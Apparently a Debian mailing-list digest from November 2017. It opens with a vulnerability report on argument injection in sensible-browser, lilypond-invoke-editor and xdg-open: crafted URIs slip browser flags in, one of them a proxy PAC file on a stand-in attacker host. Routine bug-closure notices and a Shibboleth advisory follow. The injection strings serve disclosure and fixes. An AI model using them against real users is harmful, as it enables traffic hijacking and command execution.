BROWSER=chromium sensible-browser "http://www.example.com/ --incognito
~~~

This URI is invalid but if the caller does not properly validate the
URI, an attacker could add extra arguments when calling the browser.


For example, Emacs might call sensible-browser with an invalid
URI. With this configuration:

~~~elisp
(setq browse-url-browser-function (quote browse-url-generic))
(setq browse-url-generic-program "sensible-browser")
~~~

an org-mode file like this one:

~~~org
[[http://www.yahoo.fr --incognito][test]]
~~~

will trigger the incognito mode of Chromium (this does not happen with
org-mode 8.2.10 shipped in the emacs25 package but it does happen
using org-mode 9.1.2 shipped in the elpa-org package).


While this particular example is not very dangerous other arguments
can be more harmful. For example, it is possible to inject an argument
which overrides the proxy configuration (with a PAC file). This
org-mode link launches Chromium with an alternative PAC file
(silently):


~~~org
[[http://www.example.com/ 
--proxy-pac-file=http://dangerous.example.com/proxy.pac][test]]
~~~

An attacker could use this type of URI, to forward all the traffic
coming from the browser to a server he's controlling.



Possibles fixes
===

* A simple fix, would be for sensible-browser to actually check that
  the URI parameter does not contain any IFS character (which are not
  valid in URI or IRI and fail if it does).  It should probably add
  extra verification (such as checking that the argument does not
  begin by a dash).

* Another solution would be to escape IFS characters.

* The simpler fix would probably to drop support for "%s" in the
  BROWSER string: this feature is not supported by other programs
  anyway. This is "Alternative Secure BROWSER Definition" in [1].

* Or we could implement "Compatible Secure BROWSER Definition" from
  [1] but it may not be very convenient to do in shell.

Moreover, we should probably add some basic URI validation in order to
reject things like:

~~~sh
BROWSER=chromium sensible-browser "--incognito"
~~~



Additional problems
===

sensible-browser does not handle empty browser in the BROWSER
environment variable:

~~~sh
BROWSER=":chromium" sensible-browser "xterm"
~~~

This command runs xterm (we could have used "rm -rf /").



Similar vulnerabilities in other packages
=

* lilypond

  lilypond-invoke-editor is vulnerable to the same argument injection
  [2]:

  ~~~sh
  BROWSER="chromium" lilypond-invoke-editor "http://www.example.com/ 
--incognito"
  ~~~
  
  Lilypond suggests using it as URI handler [3]:

  > When this functionality is active, LilyPond adds hyperlinks to the
  > PDF file. These hyperlinks are sent to a ‘URI helper’
  > or a web-browser, which opens a text-editor with the cursor in
  > the right place.
  >
  > To make this chain work, you should configure your PDF viewer
  > to follow hyperlinks using the ‘lilypond-invoke-editor’
  > script supplied with LilyPond.
  >
  > The program ‘lilypond-invoke-editor’ is a small helper program.
  > It will invoke an editor for the special textedit URIs, and run
  > a web browser for others. [...]

* xdg-open

  xdg-open's 'envvar' implementation (open_envvar) has this same
  problem when '%s' is present in $BROWSER:

  # Triggers incognito mode:
  BROWSER="chromium %s" xdg-open "http://www.example.com/ --incognito"

  # Does not trigger incognito mode:
  BROWSER="chromium" xdg-open "http://www.example.com/ --incognito"


References
==

[1] 

Bug#881658: marked as done (debhelper: breaks libguestfs)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 21:05:13 +
with message-id 
and subject line Bug#881658: fixed in debhelper 10.10.8
has caused the Debian Bug report #881658,
regarding debhelper: breaks libguestfs
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
881658: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881658
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: debhelper
Version: 10.10.7
Severity: serious
Justification: breaks reverse-dependencies.

Hello, I tried to rebuild libguestfs in ubuntu, and I found that commit [1]

broke dh_install for packages using regex like:
usr/include/guestfs.h
usr/lib/*-*/libguestfs.a
usr/lib/*-*/libguestfs.so
usr/lib/*-*/libguestfs.la
usr/lib/*-*/pkgconfig/*


ending up in:
dh_install -X.la -X.so.owner -Xbindtests -X/usr/lib/go/ -X/usr/lib/go- 
-Xpackages.orig -Xetc/php.d \
--fail-missing
dh_install: Please use dh_missing --list-missing/--fail-missing instead
dh_install: This feature will be removed in compat 12.
dh_install: libguestfs-dev missing files: usr/lib/*-*/libguestfs.la
dh_install: libguestfs-gobject-dev missing files: 
usr/lib/*-*/libguestfs-gobject-*.la
dh_install: php-guestfs missing files: /etc/php.d
dh_install: missing files, aborting

I reverted that commit and uploaded in Ubuntu, I didn't check the debian 
package, but should be affected
by the same bug
(build ongoing here [2], will finish/fail hopefully in some minutes)

[1] 
https://anonscm.debian.org/git/debhelper/debhelper.git/commit/dh_install?id=874410ef1389fe2a62c9361c75915c8541828b93
[2] 
http://debomatic-amd64.debian.net/distribution#unstable/libguestfs/1.36.10-1/buildlog




signature.asc
Description: OpenPGP digital signature
--- End Message ---
--- Begin Message ---
Source: debhelper
Source-Version: 10.10.8

We believe that the bug you reported is fixed in the latest version of
debhelper, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 881...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Niels Thykier  (supplier of updated debhelper package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Wed, 15 Nov 2017 19:46:00 +
Source: debhelper
Binary: debhelper dh-systemd
Architecture: source
Version: 10.10.8
Distribution: unstable
Urgency: medium
Maintainer: Debhelper Maintainers 
Changed-By: Niels Thykier 
Description:
 debhelper  - helper programs for debian/rules
 dh-systemd - debhelper add-on to handle systemd unit files - transitional pack
Closes: 881658
Changes:
 debhelper (10.10.8) unstable; urgency=medium
 .
   [ Niels Thykier ]
   * Document that compat 11 is now in its open beta phase.
   * Dh_Getopt: Improve warning message when a package is excluded
 due to profiles or architecture restrictions.
   * dh_install: Properly allow patterns to be excluded without
 complaining about missing files.  (Closes: #881658)
   * qmake.pm: Ensure that the qmake cross-build config file
 survives until clean.
 .
   [ Dmitry Shachnev ]
   * qmake.pm: Set QMAKE_LINK correctly for cross-builds.
Checksums-Sha1:
 066ae8b686d56c1bc9be53326090f71102b2d618 1795 debhelper_10.10.8.dsc
 f33ccba194391a27b348277e2dbf1b9ff3b7960e 430984 debhelper_10.10.8.tar.xz
 71bdeee16c6cd1f6a35227a37877696924f507d3 4510 
debhelper_10.10.8_source.buildinfo
Checksums-Sha256:
 ed5353a99244c5a7a42c11f2efd64452a2db23a6ed3dc87fcd2cc366165ce5b3 1795 
debhelper_10.10.8.dsc
 a5437bd0629233aeb14133b387506b37c5dc4a3098cc22f8a5d519eca0fb76c1 430984 
debhelper_10.10.8.tar.xz
 cd0fb0a8b7172cdc5fe330bfec55c489e9d5b98ae363de6aad768f5dc601e5ef 4510 
debhelper_10.10.8_source.buildinfo
Files:
 0ff5d66d153a39f7986e0c1ea8a4ded9 1795 devel optional debhelper_10.10.8.dsc
 9eba46098cb65cbad9dd4df92e636b3e 430984 devel optional debhelper_10.10.8.tar.xz
 f163fa4dca3566536981ea0fe2ee713f 4510 devel optional 
debhelper_10.10.8_source.buildinfo

-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEsxMaRR2/33ygW0GXBUu7n32AZEIFAloMmecACgkQBUu7n32A
ZEKdSw/8Dl8273BU9NUrpsmJD3D/Y+/T9i/LOGkFHKaH47/IioP7pfSDC7XdLA1B

Bug#851054: marked as done (alpine: Please migrate to openssl1.1 in buster)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 21:04:31 +
with message-id 
and subject line Bug#851054: fixed in alpine 2.21+dfsg1-1
has caused the Debian Bug report #851054,
regarding alpine: Please migrate to openssl1.1 in buster
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
851054: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851054
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: alpine
Version: 2.20+dfsg1-2
Severity: important
Control: block 827061 by -1

Hi,

OpenSSL 1.1.0 is about to released.  During a rebuild of all packages using
OpenSSL this package fail to build.  A log of that build can be found at:
https://breakpoint.cc/openssl-1.1-rebuild-2016-05-29/Attempted/alpine_2.20+dfsg1-2_amd64-20160529-1403

On https://wiki.openssl.org/index.php/1.1_API_Changes you can see various of the
reasons why it might fail.  There are also updated man pages at
https://www.openssl.org/docs/manmaster/ that should contain useful information.

There is a libssl-dev package available in experimental that contains a recent
snapshot, I suggest you try building against that to see if everything works.

If you have problems making things work, feel free to contact us.


Kurt
--- End Message ---
--- Begin Message ---
Source: alpine
Source-Version: 2.21+dfsg1-1

We believe that the bug you reported is fixed in the latest version of
alpine, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 851...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Unit 193  (supplier of updated alpine package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Mon, 13 Nov 2017 17:09:24 -0500
Source: alpine
Binary: alpine alpine-doc alpine-pico pilot
Architecture: source
Version: 2.21+dfsg1-1
Distribution: unstable
Urgency: medium
Maintainer: Asheesh Laroia 
Changed-By: Unit 193 
Description:
 alpine - Text-based email client, friendly for novices but powerful
 alpine-doc - Text-based email client's documentation
 alpine-pico - Simple text editor from Alpine, a text-based email client
 pilot  - Simple file browser from Alpine, a text-based email client
Closes: 851054 862952 876164
Changes:
 alpine (2.21+dfsg1-1) unstable; urgency=medium
 .
   * New upstream version 2.21+dfsg1 (Closes: #862952)
 - Refresh patches.
   * Bump Standards-Version to 4.1.1.
   * Run wrap-and-sort -s.
   * d/control, d/watch: Update homepage to alpine.freeiz.com.
   * d/control, d/compat: Use debhelper compat 10.
   * d/control:
 - Switch to https in Vcs-*.
 - Mark alpine-doc as Multi-Arch foreign.
 - Drop requirement of libssl-dev to be 1.0. (Closes: #851054)
 - Drop explicit build-depend on auto(conf,make), dh-autoreconf and libtool.
 - Drop priority: extra from alpine-pico.
   * d/rules:
 - sha256sums no longer published, move to md5sums and update for 2.21.
 - Move from dh_install --list-missing to dh_missing --fail-missing.
 - Move installdocs override to installdocs-indep.
 - Only override dh_auto_configure with non-default options.
 - Don't verify files are there before moving, we should error out if not.
 - Drop obsolete --with autoreconf.
   * Merge d/p/30_fix_man_page_hardcoded_paths.patch and
 d/p/40_fix_filter_hardcoded_paths.patch into d/p/10_config2etc.patch.
   * Add descriptions to all patches.
   * d/control, d/p/95_cross.patch, d/rules: Fix FTCBFS.
 Thanks to Helmut Grohne for the initial patch. (Closes: #876164)
   * d/s/lintian-overrides: js file has long lines, but is sourceful.
Checksums-Sha1:
 19d4c50c9ae5ba5cf6a4f988512659901546ae42 2263 alpine_2.21+dfsg1-1.dsc
 892b16ba8c1448f5d6749d4ad9e8e609f8079c0d 4231316 alpine_2.21+dfsg1.orig.tar.xz
 6f6513ecd8d5391203ce0ddc46b1e109d2747b2c 17692 
alpine_2.21+dfsg1-1.debian.tar.xz
 7e8baeee78585b551a443dfad0b816f7ef18147d 8023 
alpine_2.21+dfsg1-1_amd64.buildinfo
Checksums-Sha256:
 ec2cde5fcf884cdd0607d1b9d58476b178e7e108263855b987adabbc0dbec9e3 2263 
alpine_2.21+dfsg1-1.dsc
 

Bug#874708: anthy (EUCJP->UTF-8) and *-anthy packages

[Adrian Bunk]

On Tue, Nov 07, 2017 at 11:44:45PM +0900, Osamu Aoki wrote:
>...
> Even these are updated with manual patches, all these updated package
> needs to move together from unstable to testing.

Not necessarily - the old library will can kept in testing until all 
reverse dependencies have migrated.

> I am not very familiar
> with this ABI breaking library update.  We may need to add BREAKS: to
> anthy to ensure this.  (I am not sure)  That may reqire to upload -7 for
> anthy.
> 
> Anyway, these need to be properly coordinated.
>...

It might be enough to just close this bug - this bug is currently the 
main blocker for the testing migration.

> Osamu

cu
Adrian

-- 

   "Is there not promise of rain?" Ling Tan asked suddenly out
of the darkness. There had been need of rain for many days.
   "Only a promise," Lao Er said.
   Pearl S. Buck - Dragon Seed

Processed: opensaml2: Dynamic MetadataProvider fails to install security filters (CPPOST-105)

[Debian Bug Tracking System]

Processing control commands:

> clone -1 -2
Bug #881856 [src:opensaml2] opensaml2: Dynamic MetadataProvider fails to 
install security filters (CPPOST-105)
Bug 881856 cloned as bug 881857
> reassign -2 shibboleth-sp2 2.5.3+dfsg-2
Bug #881857 [src:opensaml2] opensaml2: Dynamic MetadataProvider fails to 
install security filters (CPPOST-105)
Bug reassigned from package 'src:opensaml2' to 'shibboleth-sp2'.
No longer marked as found in versions opensaml2/2.5.3-2.
Ignoring request to alter fixed versions of bug #881857 to the same values 
previously set
Bug #881857 [shibboleth-sp2] opensaml2: Dynamic MetadataProvider fails to 
install security filters (CPPOST-105)
There is no source info for the package 'shibboleth-sp2' at version 
'2.5.3+dfsg-2' with architecture ''
Unable to make a source version for version '2.5.3+dfsg-2'
Marked as found in versions 2.5.3+dfsg-2.
> retitle -2 shibboleth-sp2: Dynamic MetadataProvider fails to install security 
> filters (SSCPP-763)
Bug #881857 [shibboleth-sp2] opensaml2: Dynamic MetadataProvider fails to 
install security filters (CPPOST-105)
Changed Bug title to 'shibboleth-sp2: Dynamic MetadataProvider fails to install 
security filters (SSCPP-763)' from 'opensaml2: Dynamic MetadataProvider fails 
to install security filters (CPPOST-105)'.

-- 
881856: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881856
881857: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881857
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881856: opensaml2: Dynamic MetadataProvider fails to install security filters (CPPOST-105)

[Salvatore Bonaccorso]

Source: opensaml2
Version: 2.5.3-2
Severity: grave
Tags: patch security upstream
Justification: user security hole
Control: clone -1 -2
Control: reassign -2 shibboleth-sp2 2.5.3+dfsg-2
Control: retitle -2 shibboleth-sp2: Dynamic MetadataProvider fails to install 
security filters (SSCPP-763)

Hi

As per https://shibboleth.net/community/advisories/secadv_20171115.txt
an issue affecting opensaml2 and shibboleth-sp2:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Shibboleth Service Provider Security Advisory [15 November 2017]

An updated version of the Shibboleth Service Provider software
is available which corrects a critical security issue in the
"Dynamic" metadata provider plugin.

Deployers making use of the affected feature should apply the
relevant update at the soonest possible moment.

NOTE: CVEs for this issue are forthcoming from the Debian Project
and this advisory will be updated if and when they are obtained.

Dynamic MetadataProvider fails to install security filters

The Shibboleth Service Provider software includes a MetadataProvider
plugin with the plugin type "Dynamic" to obtain metadata on demand
from a query server, in place of the more typical mode of downloading
aggregates separately containing all of the metadata to load.

All the plugin types rely on MetadataFilter plugins to perform critical
security checks such as signature verification, enforcement of validity
periods, and other checks specific to deployments.

Due to a coding error, the "Dynamic" plugin fails to configure itself
with the filters provided to it and thus omits whatever checks they are
intended to perform, which will typically leave deployments vulnerable
to active attacks involving the substitution of metadata if the network
path to the query service is compromised.

Affected Systems
==
All versions of the Service Provider software prior to V2.6.1 contain
this vulnerability.

There are no known mitigations to prevent this attack apart from
applying this update. Deployers should take immediate steps, and
may wish to disable the use of this feature until the upgrade is done.

Service Provider Deployer Recommendations
===
Upgrade to V2.6.1 or later of the Service Provider and restart the
shibd service/daemon.

Sites relying on official RPM packages or Macports can update via the
yum and port commands respectively.

For those using platforms unsupported by the project team directly,
refer to your vendor or package source directly for information on
obtaining the fixed version. If the update from your vendor lags,
you may consider building from source for your own use as an interim
step.

The patch commit that corrects this issue can be found at [1].

Additional Recommendations for Federation Operators
=
Operators of metadata query services in support of this feature may
wish to consider implementing security checks after a suitable upgrade
window has elapsed to prevent use of affected versions or follow up
with deployers. The User Agent string in requests to the service
will contain the version of the software.

Note Regarding OpenSAML Library
=
An identical issue exists in the DynamicMetadataProvider class in
the OpenSAML-C library in all versions prior to V2.6.1. Applications
making direct use of this library must be independently updated to
correct this vulnerability, but this fix does not correct the issue
with respect to the use of the Shibboleth SP.

The patch commit that corrects the OpenSAML issue can be found at [2].

Credits
=
Rod Widdowson, Steading System Software LLP

[1] https://git.shibboleth.net/view/?p=cpp-sp.git;a=commit;
h=b66cceb0e992c351ad5e2c665229ede82f261b16

[2] https://git.shibboleth.net/view/?p=cpp-opensaml.git;a=commit;
h=6182b0acf2df670e75423c2ed7afe6950ef11c9d

URL for this Security Advisory:
https://shibboleth.net/community/advisories/secadv_20171115.txt

-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEE3KoVAHvtneaQzZUjN4uEVAIneWIFAloMTwMACgkQN4uEVAIn
eWKF4hAAqJxTRUQd/BxyQA4Cnq0ysA4A+Ld1+odGrBGQp4zKjmY4lK1SqbKKsPV3
7fJvFfmojZ5nWE/KtwHSoFyqAFqYLy/2MtwMUkF/lNQTQdgjVAJ0jTRSIvMZw0H+
PGfniwN+qSowwNQe6/nV9TbkSbFEfJSWcQ+VZkzchltwD4I2DQR7VTy4rlDfTj3L
WTpz7+2927pawl0ELwYF4wdDf0JTA0b7hYy9Hbm0WZyOiN+nl//zTV2ZtzlwWt+k
fNilA4BVl5OPmosp1FuPgsxCThRkHrr9SIwDeQDngSQqp8zomhDAuFLV6AZEuPXT
hVoysaQDe12bbx6680uGSIvSs35qCiuqe8em+8Dek/Abiu0NDvPlpP01vMxYQc+U
RN5emyWyFIbt4JDbYIaBz0sBYDcRNTMQrt/a5EQ1NCGx8mm5UIeDXacdd1MWb9hj
f+KfO68JHMxZuONj5RysvByi6EyOuBuoGDsXoEzzGQQtmNa8e1wQurJYDnSAp+uA
xayZKA2ea2FRpI0ON1UaZLARrn6o0Jf28FrbVO+h7e2wiX3la0oQKF5qBJ0sBYhP
5fXR/otDKeAz/3kZC/iSsDXY+ApLYurNk9AKMP4hfAfk5/xpBA7IisGk+w3RlJju
d3iu9xFlcShS+pXbf1+P5qW1QFXZYnPU3gJlzTKcNbqcOPbLS/8=
=IpAG
-END PGP SIGNATURE-

There is though the statement that CVEs will be assigned by the Debian
project. This cannot be done, since the 

Bug#880962: marked as done (mips*: "gcc --help=target --help=optimizers" busyloops forever)

[Debian Bug Tracking System]

 a Valgrind-based detector of data races (runti
 libtsan0-dbg - ThreadSanitizer -- a Valgrind-based detector of data races 
(debug
 libubsan0  - UBSan -- undefined behaviour sanitizer (runtime)
 libubsan0-dbg - UBSan -- undefined behaviour sanitizer (debug symbols)
 libx32asan4 - AddressSanitizer -- a fast memory error detector (x32)
 libx32asan4-dbg - AddressSanitizer -- a fast memory error detector (x32 debug 
symbo
 libx32atomic1 - support library providing __atomic built-in functions (x32)
 libx32atomic1-dbg - support library providing __atomic built-in functions (x32 
debug
 libx32cilkrts5 - Intel Cilk Plus language extensions (x32)
 libx32cilkrts5-dbg - Intel Cilk Plus language extensions (x32 debug symbols)
 libx32gcc-7-dev - GCC support library (x32 development files)
 libx32gcc1 - GCC support library (x32)
 libx32gcc1-dbg - GCC support library (debug symbols)
 libx32gfortran-7-dev - Runtime library for GNU Fortran applications (x32 
development fil
 libx32gfortran4 - Runtime library for GNU Fortran applications (x32)
 libx32gfortran4-dbg - Runtime library for GNU Fortran applications (x32 debug 
symbols)
 libx32go11 - Runtime library for GNU Go applications (x32)
 libx32go11-dbg - Runtime library for GNU Go applications (x32 debug symbols)
 libx32gomp1 - GCC OpenMP (GOMP) support library (x32)
 libx32gomp1-dbg - GCC OpenMP (GOMP) support library (x32 debug symbols)
 libx32gphobos-7-dev - Phobos D standard library (x32 development files)
 libx32gphobos71 - Phobos D standard library (runtime library)
 libx32gphobos71-dbg - Phobos D standard library (debug symbols)
 libx32itm1 - GNU Transactional Memory Library (x32)
 libx32itm1-dbg - GNU Transactional Memory Library (x32 debug symbols)
 libx32lsan0 - LeakSanitizer -- a memory leak detector (x32)
 libx32lsan0-dbg - LeakSanitizer -- a memory leak detector (x32 debug symbols)
 libx32objc-7-dev - Runtime library for GNU Objective-C applications (x32 
development
 libx32objc4 - Runtime library for GNU Objective-C applications (x32)
 libx32objc4-dbg - Runtime library for GNU Objective-C applications (x32 debug 
symbo
 libx32quadmath0 - GCC Quad-Precision Math Library (x32)
 libx32quadmath0-dbg - GCC Quad-Precision Math Library (x32 debug symbols)
 libx32stdc++-7-dev - GNU Standard C++ Library v3 (development files)
 libx32stdc++6 - GNU Standard C++ Library v3 (x32)
 libx32stdc++6-7-dbg - GNU Standard C++ Library v3 (debugging files)
 libx32ubsan0 - UBSan -- undefined behaviour sanitizer (x32)
 libx32ubsan0-dbg - UBSan -- undefined behaviour sanitizer (x32 debug symbols)
Closes: 880962 881372 881729 881775
Changes:
 gcc-7 (7.2.0-15) unstable; urgency=medium
 .
   * Update to SVN 20171115 (r254781) from the gcc-7-branch.
 - Fix PR fortran/82934, PR fortran/78619, PR fortran/82869,
   PR tree-optimization/82985, PR tree-optimization/81790,
   PR debug/82155.
   * Fix libgo build on ia64 (Jason Duerstock). Closes: #881372.
   * Port libgo to the Hurd (Svante Signell).
   * Compress debug symbols for compiler binaries with dwz.
   * Fix PR other/82880, gcc --help=target hangs on mips (James Cowgill).
 Closes: #880962.
   * Add support for a plethora of mips r6 packages (YunQiang Su).
 Closes: #881729.
   * gcc-7-base: Add breaks to gnat (<< 7). Closes: #881775.
Checksums-Sha1:
 5fb1e457eca8a844a003fb84023760c5c85e3ed6 33199 gcc-7_7.2.0-15.dsc
 31e9cb62041a8a0242b5a9bcea12bc58202652ff 3252463 gcc-7_7.2.0-15.diff.gz
 377fe9450db9a7b3ba4836843e57c676913baf72 10300 gcc-7_7.2.0-15_source.buildinfo
Checksums-Sha256:
 e40dc7bda573589d6972f785526227c232ec5da8192e16ec5e1ab69890e87c18 33199 
gcc-7_7.2.0-15.dsc
 9966fcc5fcaddbb9fc49afddfea5bb1018e3d119c7f0c7d4daf428960a5cccd8 3252463 
gcc-7_7.2.0-15.diff.gz
 2a57ce949e4807608d1055594fe7130218bb27602e573a46221c0c38fac03795 10300 
gcc-7_7.2.0-15_source.buildinfo
Files:
 fe5f8d58d9aeb870e8335f8593fc7c4f 33199 devel optional gcc-7_7.2.0-15.dsc
 f74a924184967235435c2e0bd1d416fb 3252463 devel optional gcc-7_7.2.0-15.diff.gz
 a9c4477b56817785bb2dcb36e88917ff 10300 devel optional 
gcc-7_7.2.0-15_source.buildinfo

-BEGIN PGP SIGNATURE-

iQJEBAEBCAAuFiEE1WVxuIqLuvFAv2PWvX6qYHePpvUFAloMki4QHGRva29AZGVi
aWFuLm9yZwAKCRC9fqpgd4+m9UhMD/9C5jxOJ07kONZj5unslh9E2qxr6ePfnSxv
ytj86kaEnGqCB1wYdItioUk3CmoAJBvjD7ZJWBCZmDyvQxwtO7tFB8s8etnXU6qA
XmassFPthj2+bCyyYt0p+7WHHX55sZp8rt4wxHAMbd6RqOh91VoMiiGM/IAwE72J
RUvxvpAjE6sd75nEhPwJXEJ61TbOO/Lr7zlQsUWSYfoRu/qe5PDyWR3fV2+OqpKI
vW52LpQXiVPtviUYXQNWVYBlX2OCJ5LzXFkIR2gnjr+XoaP1JsYwN4yPwFfxy+8k
pH+7qWjUaYkeEOPOlQLhlF8jmbN7B0KLnoE5Ih497jHi/Yukf0UrajyPeffqD0mV
e8lQ1AmKYja/mBoojD0R50BbyDSlNG3fB1yyvHHE+cPrMAa17xvjTMWRWKnP0ln4
Nma8FDy0o3NkidKawDC/GN/LsZCvVWJH9uZcS2pTOET9DXHDI7zjhtZior3QDQv9
M1t0hybRHIwRXIxHAFM48BsK9PuQBQKbQPFCvsV55lQz9P76XQvY/7Aq+y4TBt0W
WhUUdPPatyp0in22tisBenDFyYp43JMEVygiksFL10w2k0kquGyoOVQjIVFftYpz
kypwBwy4Lv+4cq66h7JwNs2X5e9UGMODC6Y0oeVtyGe/OzDeqY4tb+ZGlNG6RBj+
hrkNSk4SMw==
=TSGq
-END PGP SIGNATURE End Message ---

Bug#881795: marked as done (fix ftbfs with updated libcdio)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 19:49:08 +
with message-id 
and subject line Bug#881795: fixed in kover 1:6-1
has caused the Debian Bug report #881795,
regarding fix ftbfs with updated libcdio
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
881795: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881795
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: src:kover
Version: 1:4-11
Severity: serious
Tags: sid buster patch

kover ftbfs with updated libcdio with the updated libcdio. Upstream version 6
builds fine with that.

see https://launchpad.net/ubuntu/+source/kover for a packaging proposal.
--- End Message ---
--- Begin Message ---
Source: kover
Source-Version: 1:6-1

We believe that the bug you reported is fixed in the latest version of
kover, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 881...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Pino Toscano  (supplier of updated kover package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Wed, 15 Nov 2017 20:22:27 +0100
Source: kover
Binary: kover
Architecture: source
Version: 1:6-1
Distribution: unstable
Urgency: medium
Maintainer: Pino Toscano 
Changed-By: Pino Toscano 
Description:
 kover  - WYSIWYG CD cover printer
Closes: 881795
Changes:
 kover (1:6-1) unstable; urgency=medium
 .
   * New upstream release:
 - uses cdio >= 0.90 (Closes: #881795)
   * Update the patches:
 - upstream_fix-compilation-errors-with-gcc-4.4.patch: drop, backported
   from upstream
 - upstream_make-kover.desktop-valid.patch: drop, backported from upstream
 - upstream_applied-patch-from-Adi-Roiban-adi-roiban.ro.patch: drop,
   backported from upstream
 - fix-PACKAGE-VERSION.diff: remove upstream changes, leave parts in
   comments (so it can be upstreamed)
   * Bump the libcdio-cdda-dev build dependency to >= 0.90, as required by
 upstream.
   * Bump Standards-Version to 4.1.1, no changes required.
   * Remove trailing spaces in changelog.
Checksums-Sha1:
 4fee4bc92f0e14267e8c7e9cd3a8898c613ca51a 1858 kover_6-1.dsc
 3557d9d2cd38bae89c0287bb924a77c5f1d0bb96 87898 kover_6.orig.tar.bz2
 e28bd85e40003745cea952e12d451bc8c0b4b466 7244 kover_6-1.debian.tar.xz
 d2e8b2756ce2980ce3dd6223b7aa4d57ba1bc41a 19781 kover_6-1_source.buildinfo
Checksums-Sha256:
 4380ca8625f1481429314a97df75471fbb9ab6783642c371ee4099327c20fb61 1858 
kover_6-1.dsc
 87494299d5dd7a51bbf3a1739f372da680744f14271c43d8495eca15f1f2480a 87898 
kover_6.orig.tar.bz2
 9452d57fd8e59ee4627802733dda5328437363aab736512eabb80edbba1519c4 7244 
kover_6-1.debian.tar.xz
 cf60921f8977e5af09cb2a3fe667510d1c0c1a8712c07ac75bd9f7ebf6492119 19781 
kover_6-1_source.buildinfo
Files:
 67d79ef8b0e12c0e8245783323f5b227 1858 graphics optional kover_6-1.dsc
 9504afd8a779c54d7c77fb28d7b5c76e 87898 graphics optional kover_6.orig.tar.bz2
 c327d4b730b6a3adfb112538972cf39b 7244 graphics optional kover_6-1.debian.tar.xz
 882a75959ad9d7044593c550f6028f3f 19781 graphics optional 
kover_6-1_source.buildinfo

-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEXyqfuC+mweEHcAcHLRkciEOxP00FAloMlMYACgkQLRkciEOx
P03xKA/+Liyyg/K6zkieQHIAmfvosd2y2biB8uqkcElTYO9/grLD8XAOm9+NwBLG
ny6EoUWhCHWeVBfFx7e7b8j/F59zVD3ZbXnrDqcqDAExQv+BhmThsbImAViXFUDC
XgFJLrBF3PAEWbs55kj8XwUZEqFTj7RVEi7vxU5VMMoLO6nim6XtFoZzVDIGPd4/
oS1ibVHDe/6NOXcPg5qmleTwUQaqbr8Vr83oisXEygyk1kcdY+tduThXFc371n/B
Xv0Rk4sGHEQM9nXH+ghmUbADmcKl4HJSnHUXd2LtGtBVOxTeO/9txI5nCwRDc0aR
JwuKlC72Jozfk3haVuQsRkRL9V8f7uyauWSJASqh5jG4A8/mpyIneKyFYtFpV9yW
JGrjiZ8nFmf6XVPCZRtjCtWvAz1dYetG4kRZH88Y3tN+NZfz7xHjoHtlZoBu/6WS
fWk1wgrDWM5BrLQTKvWnZK8pBT0wF/YFAL5ED06te6tSUKruzlR2sZJTtTDnLTmb
DVf9B7+qPskcZHYwfdGBKFrhuG+IYnZQ2HHbwcohoC3Faphg1gWlAzx8yFPjqTxW
Zetr5swMiq5OFSAsTwoQSt7ye++Bg+j5s2Ftgjv+nq2fVpnlJ+lier1M5V2B9ifL
Ywm88FVs/0rJU+Nu2dvoUr6W6OpbV+7EDZJnd6peVfczAMseV9U=
=VvVu
-END PGP SIGNATURE End Message ---

Bug#881793: marked as done (fix ftbfs with updated libcdio-paranoia)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 20:29:17 +0100
with message-id 
and subject line Re: Bug#881793: fix ftbfs with updated libcdio-paranoia
has caused the Debian Bug report #881793,
regarding fix ftbfs with updated libcdio-paranoia
